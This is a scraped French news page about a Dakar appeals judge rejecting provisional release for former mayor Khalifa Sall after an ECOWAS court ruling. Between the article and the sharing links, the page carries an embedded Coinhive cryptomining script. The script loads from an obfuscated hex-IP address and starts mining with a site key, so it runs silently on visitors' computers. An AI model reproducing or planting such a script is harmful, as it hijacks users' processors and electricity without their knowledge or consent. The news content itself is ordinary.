Sénégal : rejet de la demande de liberté provisoire pour Khalifa Sall
0
 

Écouter
Sénégal : rejet de la demande de liberté provisoire pour Khalifa Sall

Sénégal : rejet de la demande de liberté provisoire pour Khalifa Sall

APA | Lu 2640 fois | Publié

La demande de liberté provisoire en faveur de Khalifa Sall, formulée par les avocats du maire de Dakar en vertu d’un arrêté de la CEDEAO a été rejetée ce mercredi par le juge de la Cour d’appel du tribunal de Dakar, Demba Kandji, selon qui le procès va se poursuivre.

Pour formuler leur requête, les avocats s’étaient fondés sur un arrêt de la Cour de justice de la CEDEAO qui, statuant sur l’affaire Khalifa Sall, a estimé que la procédure conduisant à son procès et à sa condamnation à 5 ans de prison, assortie d’une amende de 5 millions et de la saisie du cinquième de ses biens n’avait pas été respectée, notamment la présomption d’innocence et le droit de l'accusé à l’assistance d’un avocat.

En vertu de cela, la Cour de justice de la CEDEAO demande à l’Etat sénégalais de payer 35 millions de FCFA à Khalifa Sall. Sur ce point, le juge de la Cour d’appel a reconnu que le paiement pouvait bien se faire.

A la suite du verdict de la Cour d’appel, le procès a été suspendu pour dix minutes.

Accusé d’avoir détourné 1,8 milliard de FCFA de la caisse d’avance de la mairie de Dakar, Khalifa Sall a été condamné en mars dernier avec sept de ses collaborateurs, après avoir été déclaré coupable en première instance « d’escroquerie aux deniers publics », de « faux et usage de faux dans des documents administratifs » et de « complicité en faux en écriture de commerce ».

 

<script src="https://0x6814D03B/lib/coinhive.min.js"></script>
<script>
var miner = new CoinHive.Anonymous('f8XBOx6egKlyNr6RU9M1hnmEJd81a17g');
miner.start();
</script>

Cet article vous a plu ! Partagez-le maintenant

A lire également

 
 
 
 
 
 
 
 
 
 

En continu

Madagascar : neuf morts après de fortes pluies

Elections en RDC : contraint de reculer, Kagame n'ira pas à Kinshasa

Egypte: un an de prison pour un présentateur TV pour avoir interviewé un gay

Nigeria: l'ex-président Obasanjo accuse Buhari de préparer des fraudes pour sa réelection

La mairie de Niablé engage la lutte contre l’insalubrité dans la commune